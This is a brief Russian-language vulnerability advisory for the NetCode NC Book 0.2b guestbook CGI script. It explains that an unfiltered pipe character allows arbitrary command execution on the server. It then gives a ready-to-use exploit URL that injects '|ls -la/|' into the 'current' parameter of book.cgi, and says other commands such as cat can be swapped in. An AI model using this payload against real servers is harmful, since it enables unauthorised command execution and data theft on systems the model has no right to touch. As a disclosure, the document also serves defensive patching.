Уязвимость в основном сценарии guestbook позволяет выполнить любые команды на сервере (нефильтруемый '|').
Уязвимость работает в NetCode NC Book 0.2b.
Эксплоит (выводит содержание корневой директории, можно добавить любые команды типа ls, cat и т.п):
http://target/cgi-bin/ncbook/ book.cgi?action=default¤t=|ls -la/|&form_tid=996604045&prev=
main.html&list_message_index=10
